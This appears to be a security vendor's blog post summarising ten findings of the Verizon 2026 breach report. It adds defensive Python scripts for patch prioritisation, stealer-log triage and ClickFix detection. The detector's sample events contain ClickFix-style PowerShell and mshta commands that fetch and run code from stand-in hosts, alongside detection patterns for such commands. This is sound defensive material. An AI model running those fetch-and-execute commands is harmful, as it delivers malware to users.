Verizon 2026 DBIR: 10 Takeaways You Should Know
Verizon’s 2026 Data Breach Investigations Report (DBIR) analyzes more than 31,000 security incidents and 22,000 confirmed breaches across organizations in 145 countries, the largest breach dataset the report has ever examined. This 19th edition marks a clear inflection point: vulnerability exploitation has overtaken credential abuse as the most common initial access vector, generative AI is now a measurable part of the attacker toolkit, and third-party risk has surged to levels that can no longer be treated as a secondary concern. Whether you run a global enterprise or a 50-person company, the trends in this year’s report will reshape how you prioritize your defenses.
Below, we unpack the 10 most important takeaways from the Verizon 2026 DBIR.
How Attack Patterns Have Shifted Since Last Year
Before diving in, here’s a quick look at how the distribution of breach patterns has changed year over year (share of all breaches in each report):

| Breach Pattern | 2025 | 2026 |
|---|---|---|
| System Intrusion | 53% | 61% |
| Social Engineering | 17% | 17% |
| Basic Web Application Attacks | 18% | 10% |
| Miscellaneous Errors | 12% | 8% |
| Privilege Misuse | 7% | 3% |
System Intrusion has tightened its grip at the top, now accounting for 61% of all breaches, reflecting the dominance of ransomware-driven, multi-step attack campaigns. Meanwhile, Basic Web Application Attacks fell significantly, which could indicate defenders are getting better at hardening web-facing surfaces, or simply that attackers have found more rewarding paths in. Social Engineering holds steady, and Privilege Misuse continues its gradual decline.
1. Vulnerability Exploitation Is Now the #1 Initial Access Vector
For years, stolen credentials were the attacker’s preferred front door. That era is now over. The 2026 DBIR reports that exploitation of vulnerabilities has risen to 31% of initial access vectors, a 55% increase over last year’s 20%, overtaking credential abuse for the first time.

Vulnerability exploitation has surpassed credential abuse as the most common initial access method in 2026. (Verizon 2026 DBIR)
The backdrop to this rise is a patching crisis that is getting worse, not better. Only 26% of CISA KEV vulnerabilities were fully remediated by organizations, down sharply from 38% the previous year. The median time to fully patch a known exploited vulnerability climbed to 43 days, nearly two weeks longer than in 2025. And the volume of vulnerabilities organizations need to patch has grown: the median number of KEV vulnerabilities per organization rose to 16 in 2025, up from 11 the year before, roughly 50% more work.

Only 26% of critical vulnerabilities in the CISA KEV catalog were fully remediated in 2025, down from 38% the year before. (Verizon 2026 DBIR)
The practical message is clear: patch management is no longer just an IT hygiene issue. It is now the single most exploited gap attackers are walking through.
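The remediation numbers above (26% of KEV entries fully patched, a 43-day median, 16 KEV CVEs per organization) are only measurable if you track KEV exposure per asset and per due date. The script below is an added example for this article, not code from Verizon or CISA: it reads the CISA KEV catalog in the JSON schema CISA publishes (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse), matches it against a software inventory, ranks open findings by known ransomware use and days past the KEV due date, and computes the median time to remediate closed findings. The catalog excerpt, inventory, dates and closed-finding pairs are constructed for the example; the CVE IDs are real catalog entries but their dates and flags here are illustrative, so work from the live feed in practice.

```python
"""Prioritize KEV findings against an asset inventory.

Added example for this article; it is not code from Verizon or CISA. The KEV
feed is published at
https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
and uses the field names consumed below.
"""
import json
from datetime import date
from statistics import median

# Constructed three-entry excerpt in the KEV feed's schema. The CVE IDs are
# real catalog entries, but the dates and ransomware flags here are
# illustrative; always work from the live feed.
KEV_SAMPLE = json.loads("""
{"vulnerabilities": [
  {"cveID": "CVE-2025-0282", "vendorProject": "Ivanti",
   "product": "Connect Secure, Policy Secure, and ZTA Gateways",
   "dateAdded": "2025-01-08", "dueDate": "2025-01-15",
   "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2025-5777", "vendorProject": "Citrix",
   "product": "NetScaler ADC and Gateway",
   "dateAdded": "2025-07-10", "dueDate": "2025-07-11",
   "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2025-53770", "vendorProject": "Microsoft",
   "product": "SharePoint",
   "dateAdded": "2025-07-20", "dueDate": "2025-07-21",
   "knownRansomwareCampaignUse": "Known"}
]}
""")

# Constructed inventory: vendor/product as the asset owner records them,
# plus the KEV CVEs already confirmed patched on that host.
INVENTORY = [
    {"host": "vpn-edge-01", "vendor": "Ivanti", "product": "Connect Secure", "patched": set()},
    {"host": "adc-01", "vendor": "Citrix", "product": "NetScaler", "patched": set()},
    {"host": "sp-01", "vendor": "Microsoft", "product": "SharePoint", "patched": set()},
    {"host": "db-01", "vendor": "PostgreSQL", "product": "PostgreSQL", "patched": set()},
]
AS_OF = date(2025, 8, 1)  # constructed reporting date

# Constructed (dateAdded, dateClosed) pairs for findings already remediated.
CLOSED_FINDINGS = [
    (date(2025, 1, 8), date(2025, 2, 7)),
    (date(2025, 3, 3), date(2025, 4, 15)),
    (date(2025, 5, 1), date(2025, 6, 30)),
]


def load_kev(feed):
    """Flatten the KEV JSON into entries with parsed dates."""
    entries = []
    for v in feed["vulnerabilities"]:
        entries.append({
            "cve": v["cveID"],
            "vendor": v["vendorProject"],
            "product": v["product"],
            "added": date.fromisoformat(v["dateAdded"]),
            "due": date.fromisoformat(v["dueDate"]),
            "ransomware": v.get("knownRansomwareCampaignUse") == "Known",
        })
    return entries


def match_kev(feed, inventory, as_of):
    """Return open KEV findings for the inventory, most urgent first.

    Matching is deliberately loose (same vendor, asset product name contained
    in the KEV product string) so a wording mismatch errs toward a finding the
    analyst can dismiss rather than a silent miss.
    """
    findings = []
    for e in load_kev(feed):
        for asset in inventory:
            if e["vendor"].lower() != asset["vendor"].lower():
                continue
            if asset["product"].lower() not in e["product"].lower():
                continue
            if e["cve"] in asset["patched"]:
                continue
            findings.append({
                "host": asset["host"],
                "cve": e["cve"],
                "ransomware": e["ransomware"],
                "days_past_due": (as_of - e["due"]).days,
            })
    # Known ransomware use first, then the longest-overdue findings.
    findings.sort(key=lambda f: (not f["ransomware"], -f["days_past_due"]))
    return findings


def median_days_to_remediate(closed):
    """Median days between KEV listing and confirmed fix for closed findings."""
    return median((fixed - added).days for added, fixed in closed)


if __name__ == "__main__":
    for f in match_kev(KEV_SAMPLE, INVENTORY, AS_OF):
        flag = " [ransomware]" if f["ransomware"] else ""
        print(f'{f["host"]:12} {f["cve"]:16} {f["days_past_due"]:4} days past due{flag}')
    print("median days to remediate:", median_days_to_remediate(CLOSED_FINDINGS))
```

The sort order is a choice worth stating in your own runbook: this example puts any CVE with known ransomware use ahead of everything else, then orders by how long the KEV due date has been missed. The DBIR's 43-day median corresponds to `median_days_to_remediate` run over your own closed findings; tracking it per asset class (edge devices versus internal servers) usually shows where the backlog actually lives.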
2. Third-Party Breaches Have Surged 60% in One Year
If there is one trend in the 2026 DBIR that should trigger an immediate review of your vendor relationships, it’s this: third-party involvement in breaches jumped 60% year over year, reaching 48% of all breaches, after having already doubled the year before.
The report identifies three distinct archetypes of third-party breach:
- A vulnerability in a vendor’s software used as the initial access vector into your environment
- A vendor that hosts your data being compromised directly
- A vendor with a network or credential connection to your environment being used as a pivot point
All three showed up in high-profile 2025 campaigns. The report highlights how compromised OAuth tokens for the Salesloft Drift integration with Salesforce were used to pull customer data out of victims’ Salesforce instances, a case where breaching one third party cascaded into dozens of downstream victims.
The underlying security failures are often frustratingly basic: missing MFA on cloud accounts, excessive permissions, and weak password practices in third-party environments. Survival analysis of third-party cloud exposures shows that it takes almost eight months for 50% of weak password and permission misconfiguration findings to be resolved. Even MFA-related findings, widely acknowledged as a high-priority control, are fully remediated by only 23% of third-party organizations.

Third-party cloud misconfigurations are taking nearly eight months to resolve in half of cases, an alarmingly slow response to a known risk. (Verizon 2026 DBIR)
3. Ransomware Now Appears in Nearly Half of All Breaches
Ransomware is in 48% of all breaches this year, up from 44% in 2025. The absolute growth may look modest, but at this scale, it means ransomware is now embedded in virtually every threat category the DBIR tracks. In the System Intrusion pattern alone, Ransomware appears in 77% of breaches.
The financial picture around ransomware is more nuanced. The median ransom payment has continued its downward trend, now sitting at $139,875 (down from $150,000 the prior year), and 69% of ransomware victims chose not to pay, up from 65%. The report also presents new analysis showing that, when cross-referencing threat actor-disclosed victim lists with confirmed crypto wallet payments, only about 9% of publicized ransomware victims per group actually paid. This suggests many published victim lists may be exaggerated to bolster group credibility.

The median ransom paid has trended downward over three years as more organizations refuse to pay. (Verizon 2026 DBIR)
For defenders, a key tactical insight from this year’s data is the infostealer-to-ransomware pipeline: 50% of ransomware victims had a credential or infostealer leak event occur within 95 days before the ransomware attack. Monitoring stealer logs and dark web credential markets is increasingly an early-warning system for ransomware exposure.
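Turning stealer-log monitoring into an early warning means joining each hit against the identity directory: a leaked password for a disabled account or one rotated after the log date is noise, while a live single-factor password on an SSO or VPN portal is the precursor the 95-day figure describes. The script below is an added example for this article, not code from the DBIR or SOCRadar. It parses the URL/USER/PASS block layout that several commodity stealers write to their password dumps, keeps only entries for the organization's own domains, and ranks each hit by account status, rotation date and MFA. The log excerpt, directory export, domains and dates are all constructed.

```python
"""Triage infostealer-log hits against the identity directory.

Added example for this article, not code from the DBIR or SOCRadar. All
inputs below are constructed.
"""
import re
from datetime import date
from urllib.parse import urlsplit

CORP_DOMAINS = ("example.com",)  # assumption: the organisation's own domains

# Constructed stealer-log excerpt in the URL/USER/PASS block layout; not a real capture.
STEALER_LOG = """\
URL: https://sso.example.com/adfs/ls/
USER: j.doe@example.com
PASS: Winter2024!
SOFT: Google Chrome
============
URL: https://vpn.example.com/remote/login
USER: m.chen
PASS: Summer2025
SOFT: Microsoft Edge
============
URL: https://www.netflix.com/login
USER: jdoe_home@gmail.com
PASS: hunter2
SOFT: Google Chrome
============
"""
LOG_DATE = date(2025, 4, 10)   # constructed: when the log was first seen on a market
TODAY = date(2025, 5, 1)       # constructed: triage date

# Constructed IdP export keyed by UPN.
DIRECTORY = {
    "j.doe@example.com": {"enabled": True, "mfa": False, "pwd_changed": date(2025, 2, 1)},
    "m.chen@example.com": {"enabled": True, "mfa": True, "pwd_changed": date(2025, 4, 20)},
}

FIELD_RE = re.compile(r"^(URL|USERNAME|USER|PASSWORD|PASS)\s*:\s*(.*)$", re.I)
CANON = {"USERNAME": "USER", "PASSWORD": "PASS"}  # stealers differ in key spelling


def parse_stealer_log(text):
    """Split the dump into records; '====' lines delimit entries."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            key = m.group(1).upper()
            cur[CANON.get(key, key)] = m.group(2).strip()
        elif line.startswith("===") and cur:
            records.append(cur)
            cur = {}
    if cur:
        records.append(cur)
    return records


def is_corp_host(url):
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in CORP_DOMAINS)


def to_upn(user):
    """Bare usernames on a corporate login page are assumed to be corporate accounts."""
    user = user.strip().lower()
    return user if "@" in user else f"{user}@{CORP_DOMAINS[0]}"


SEVERITY_ORDER = ("critical", "high", "review", "info")


def triage(records, directory, log_date, today):
    """Rank corporate hits: live single-factor passwords first."""
    alerts = []
    for r in records:
        if not is_corp_host(r.get("URL", "")):
            continue                                  # personal site, out of scope
        upn = to_upn(r.get("USER", ""))
        acct = directory.get(upn)
        if acct is None:
            sev = "review"                            # unknown or departed user
        elif not acct["enabled"] or acct["pwd_changed"] > log_date:
            sev = "info"                              # disabled, or rotated after the leak
        elif acct["mfa"]:
            sev = "high"                              # live password, but MFA in the way
        else:
            sev = "critical"                          # live password, single factor
        alerts.append({"user": upn, "url": r["URL"], "severity": sev,
                       "days_since_leak": (today - log_date).days})
    alerts.sort(key=lambda a: SEVERITY_ORDER.index(a["severity"]))
    return alerts


if __name__ == "__main__":
    for a in triage(parse_stealer_log(STEALER_LOG), DIRECTORY, LOG_DATE, TODAY):
        print(f'{a["severity"]:9} {a["user"]:24} {a["url"]}  leaked {a["days_since_leak"]} days ago')
```

Two caveats when operationalizing this: stealer dumps also carry browser session cookies and tokens, so a password reset alone does not close the exposure unless active sessions are revoked as well; and the "review" bucket (accounts the directory does not know) often turns out to be former employees or contractors whose cached credentials still work on a vendor portal, which loops back to the third-party findings above.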
4. Generative AI Is Now a Measurable Part of the Attacker Toolkit
Previous DBIRs maintained a healthy skepticism about whether AI usage by threat actors was actually moving the needle on real-world breaches. The 2026 edition, which includes original research conducted with Anthropic, marks a shift in that assessment.
Across 793 unique threat actors who violated Anthropic’s acceptable use policy with malicious cybersecurity activity, the median actor sought AI assistance for 15 distinct MITRE ATT&CK techniques, with some leveraging as many as 40 to 50. Phishing-related techniques were the leading category in AI-assisted initial access, accounting for 44% of observed techniques. Exploitation-related techniques came in at 32%, a concerning finding given vulnerability exploitation’s concurrent rise as the top initial access vector.

Most threat actors used AI to assist with around 15 different attack techniques; some went as deep as 40 to 50. (Verizon 2026 DBIR)
The key nuance: less than 2.5% of observed AI-assisted techniques involved rare or novel attack methods. AI is primarily being used to accelerate and scale techniques defenders already know how to detect, lowering the barrier for less sophisticated actors, not unlocking fundamentally new attack classes. The danger is that the “security poverty line” effect widens: even simple, well-understood attacks become more effective when they can be executed faster and at greater scale.
The Year in Review section includes December’s discovery of VoidLink, a malware framework written in six days by an AI agent, a marker of how quickly the automated threat development landscape is evolving.
5. Shadow AI Is the New Shadow IT
The insider risk landscape has a new and fast-growing dimension: Shadow AI. The DBIR reports that 67% of users are accessing AI platforms from non-corporate accounts on corporate devices. More strikingly, 45% of employees are now considered regular AI users on corporate devices, a threefold jump from 15% the prior year.
Shadow AI has become the third most common non-malicious insider action detected in DLP datasets, a fourfold increase in percentage from 2025. The most frequently submitted data type to unauthorized AI services was source code, followed by images and structured data. In 3.2% of DLP policy violations, research and technical documentation was uploaded to external AI systems, a meaningful intellectual property exposure risk.

Source code is the most common data type employees are uploading to unauthorized AI platforms, a growing IP risk. (Verizon 2026 DBIR)
The problem is compounded by browser AI plugins: the report finds that the average company has more than 15% of users with unauthorized AI extensions installed on their browsers, many of which collect browsing context including internal, non-public data.
6. Mobile-Centric Social Engineering Is 40% More Effective Than Email Phishing
Social Engineering accounts for 17% of breaches and was the third most common breach pattern in 2026. The headline finding this year is not the volume; it’s the shift in attack vectors and the measurable effectiveness gap that comes with it.
Phishing simulation data shows that mobile-centric attack vectors (voice calls and SMS) have a median success rate 40% higher than email phishing. The median email phishing simulation click rate is 1.4%; for phone-centric methods it is closer to 2%. While this difference may sound modest in isolation, at organizational scale it translates to a significantly larger pool of compromised users.

Mobile-centric social engineering vectors, voice and SMS, outperform traditional email phishing by 40% in simulation data. (Verizon 2026 DBIR)
The report also documents the rise of Pretexting as an initial access vector for ransomware, a notable upgrade in attacker sophistication. Unlike asynchronous phishing emails, pretexting requires live interaction: a threat actor impersonating a help desk agent, a vendor, or an executive in real time to manipulate the victim into granting access. This includes the now-documented pattern of attackers flooding a user with spam to trigger a fake “help desk” outreach via Microsoft Teams, then using Quick Assist or other remote tools to gain access.
The ClickFix attack is another new variant worth tracking: malicious webpages present themselves as CAPTCHAs or “verify you are human” checks, then instruct the user to paste a command they have silently copied to the clipboard into the Windows Run dialog or a terminal, delivering malware while using social pressure to bypass caution.
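Because the victim types or pastes the command themselves, ClickFix leaves a distinctive process tree: explorer.exe (which owns the Win+R Run dialog and the File Explorer address bar) spawning a script host with a command line that hides its window, fetches a payload over HTTP and often still carries the lure text as a trailing comment. The detection below is an added example for this article, not code from the DBIR. It scores constructed process-creation records shaped like Sysmon Event ID 1 fields (the field names are an assumption about your EDR's schema) and alerts only when the parent is user-facing, the child is a script host, and enough indicators fire.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example for this article, not code from the DBIR. The events and the
indicator weights are constructed for the example.
"""
import re

# Win+R and the File Explorer address bar both execute under explorer.exe.
USER_FACING_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "msiexec.exe"}

# (pattern, weight, reason); weights are a tuning assumption for this example.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"\b(?:iex|invoke-expression)\b", 2, "in-memory execution"),
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b.*https?://",
     2, "remote download"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2, "encoded command"),
    (r"\bmshta(?:\.exe)?\s+(?:https?|javascript|vbscript):", 3, "mshta remote or script URI"),
    (r"not a robot|captcha|verification id|verify you are human", 3, "fake CAPTCHA text in command"),
]

# Constructed events: the first two are ClickFix-style, the last two are benign.
EVENTS = [
    {"host": "ws-017", "user": r"CORP\a.smith",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://captcha-verify.example/p.txt)" '
                '# I am not a robot - reCAPTCHA Verification ID: 7481'},
    {"host": "ws-022", "user": r"CORP\b.lee",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://verify-human.example/check.hta"},
    {"host": "ws-031", "user": r"CORP\c.diaz",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},
    {"host": "srv-05", "user": r"CORP\ops.admin",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://updates.example/agent.ps1 -OutFile C:\\Temp\\agent.ps1"'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Sum the weights of indicators that match the command line; returns (score, reasons)."""
    score, reasons = 0, []
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, ev["cmdline"], re.I):
            score += weight
            reasons.append(reason)
    return score, reasons


def detect_clickfix(events, threshold=3):
    """Alert on script hosts spawned from a user-facing parent with a suspicious command line."""
    alerts = []
    for ev in events:
        if basename(ev["parent"]) not in USER_FACING_PARENTS:
            continue
        if basename(ev["image"]) not in SCRIPT_HOSTS:
            continue
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "score": score, "reasons": reasons})
    alerts.sort(key=lambda a: -a["score"])
    return alerts


if __name__ == "__main__":
    for a in detect_clickfix(EVENTS):
        print(f'{a["host"]} {a["user"]} score={a["score"]} ({", ".join(a["reasons"])})')
```

The parent-process constraint is what keeps the scheduled admin download on srv-05 out of the alert list even though its command line scores; variants where the user pastes into a terminal rather than Win+R need the same command-line indicators without that constraint, so expect more tuning there. For forensics, the Run dialog history in `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` preserves what was pasted even after the process telemetry has rolled over.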
7. SMBs: About 96% of Ransomware Victims Are Small Organizations
The notion that small and medium-sized businesses are too small to be worth targeting has been definitively put to rest. The 2026 DBIR finds that, of ransomware cases with known victim size information, about 96% of ransomware victims were SMBs.
This is not because large enterprises have solved ransomware. It’s because ransomware operators are largely opportunistic, and SMBs present an abundance of targets with unpatched edge devices (29% of SMB breaches involved exploited vulnerabilities in edge infrastructure), compromised credentials (38%), and more limited recovery capabilities.

System Intrusion, Basic Web Application Attacks, and Social Engineering account for 100% of SMB breaches, the same trio that has dominated for years. (Verizon 2026 DBIR)
The top three breach patterns for SMBs, System Intrusion, Basic Web Application Attacks, and Social Engineering, collectively account for 100% of SMB breaches. Third-party involvement was present in 55% of SMB breaches, meaning many small organizations are compromised through the vendors and software they rely on, not direct attacks on their own infrastructure.
SOCRadar’s Attack Surface Management (ASM) helps organizations identify exposed assets and unpatched vulnerabilities before attackers do, delivering enterprise-grade visibility without requiring an enterprise security team.

SOCRadar’s ASM module, Digital Footprint
8. Espionage Surges in APAC; EMEA Tracks Closer to Global Norms
Regional trends in the 2026 DBIR tell a story of geopolitical pressure translating directly into breach activity.
In APAC, state-affiliated actors are responsible for 36% of breaches, more than any other region. Espionage motivation was present in 36% of APAC breaches (versus 13% globally), and Secrets data was compromised in 28% of APAC breaches versus 13% globally. System Intrusion accounts for 60% of APAC breaches, while Basic Web Application Attacks doubled year over year. The July 2025 breach of Qantas, affecting more than 5 million customers via a third-party platform, is highlighted as emblematic of this region’s exposure.
In EMEA, System Intrusion accounts for 57% of breaches, up slightly from 53% last year. State-affiliated actors are present in 23% of EMEA breaches (versus 14% globally), and Espionage-motivated breaches reach 27% in the region. The September 2025 ransomware attack on Jaguar Land Rover, described as the most economically damaging cyberattack in U.K. history at £1.9 billion in losses, illustrates how third-party and supply chain interconnections can turn a single ransomware event into an industry-wide disruption affecting approximately 5,000 downstream entities.

System Intrusion dominates both APAC and EMEA, while espionage-driven breaches are proportionally far higher than global averages in both regions. (Verizon 2026 DBIR)
9. Industry Spotlight: Healthcare, Manufacturing, and Public Administration
Healthcare continues to struggle with a dual burden: externally driven ransomware and internally driven human error. Miscellaneous Errors has appeared in the top three breach patterns for Healthcare every single year the DBIR has tracked it, going back to 2014. The leading error types in 2026 are Misdelivery, Loss, and Misconfiguration, all of which have known, achievable mitigations that are simply not being implemented consistently.
System Intrusion is the top pattern, fueled in part by the Cl0p ransomware group’s exploitation of an Oracle E-Business Suite (EBS) zero-day in late 2025, which compromised Healthcare organizations among its more than 100 victims. Third-party involvement was present in 32% of Healthcare breaches.
Manufacturing saw notable growth in breach volume, with 2,713 confirmed breaches. Ransomware appeared in 61% of malware-related breaches, and exploitation of vulnerabilities was the leading initial access vector at 38%. Third-party involvement was exceptionally high at 61% of breaches.
Public Administration faces a uniquely complex threat profile: financially motivated organized crime on one side and state-aligned espionage actors (33% of breaches) on the other. Exploitation of vulnerabilities drives 82% of hacking-related breaches in government, and Internal actors account for 44% of all breaches in this sector, largely due to Misdelivery errors (which account for 88% of all errors in public administration) driven by the sheer volume of correspondence government entities generate.
10. A Look Back: The Year in Review for 2025
The DBIR’s Year in Review section documents twelve months of escalating threat activity that give important context to this year’s statistics.
- January-March set the tone with identity and edge infrastructure under siege: Chinese state actor Silk Typhoon compromised the U.S. Treasury by abusing a stolen BeyondTrust Remote Support API key; UNC5337 weaponized Ivanti Connect Secure zero-days to deploy the SPAWN malware ecosystem; and a supply chain attack on the tj-actions/changed-files GitHub Action cascaded through some 23,000 repositories. North Korea formally launched Research Center 227, a unit dedicated to AI-driven offensive hacking capabilities.
- April-June saw ransomware operators escalate toward maximum business disruption: Marks & Spencer, Co-op (6.5 million members’ data exposed), and Harrods were hit in rapid succession. Oracle Cloud suffered a claimed exfiltration of 6 million records. Operation Endgame disrupted Lumma Stealer infrastructure across 1,300 domains, but developers restored operations within days.
- July-September brought infrastructure attacks with historic financial consequences: the JLR ransomware attack (£1.9 billion), CitrixBleed 2 (CVE-2025-5777 in NetScaler ADC and Gateway), and the ShinyHunters Salesloft/Salesforce supply chain campaign that reached Google, Zscaler, and Cisco among its victims. Amazon revealed it had blocked more than 1,800 North Korean “remote worker” infiltration attempts.
- October-December closed the year with record-breaking DDoS volume (the Aisuru botnet reached a peak of 29.7 Tbps), the emergence of PromptLock, the first AI-powered ransomware to generate cross-platform encryption scripts dynamically via local LLMs, and VoidLink, a malware framework built by an AI agent in six days, which the report describes as “a point of no return for automated threat development.”
Conclusion
The 2026 Verizon DBIR delivers a clear and consistent message: the fundamentals matter more than ever, even as the threat landscape accelerates in complexity. The key themes this year:
- Vulnerability management is the new credential hygiene – exploitation has overtaken stolen credentials as the top initial access vector, and patching backlogs are growing faster than remediation capacity.
- Third-party risk is no longer a secondary concern – at 48% of all breaches and growing 60% year over year, vendor and supply chain exposure is now a primary attack surface.
- Ransomware is ubiquitous – 48% of all breaches, about 96% of ransomware victims are SMBs, and the infostealer-to-ransomware pipeline is shortening the window between credential theft and full compromise.
- AI is operational for attackers – GenAI is accelerating the scale and accessibility of known techniques, and the first fully AI-developed malware frameworks have appeared.
- Shadow AI is a new data loss vector – 67% of users are accessing AI from non-corporate accounts on corporate devices, with source code as the most commonly exposed data type.
SOCRadar’s Extended Threat Intelligence platform helps organizations address each of these vectors, from monitoring Dark Web stealer logs for pre-ransomware credential exposure, to tracking third-party risk posture, to vulnerability intelligence that prioritizes patching based on active exploitation signals. In an environment where the margin between an early warning and a confirmed breach is measured in days, proactive visibility is the critical differentiator.

SOCRadar’s Advanced Dark Web Monitoring, Black Markets
For the full dataset and methodology, see the Verizon 2026 DBIR.
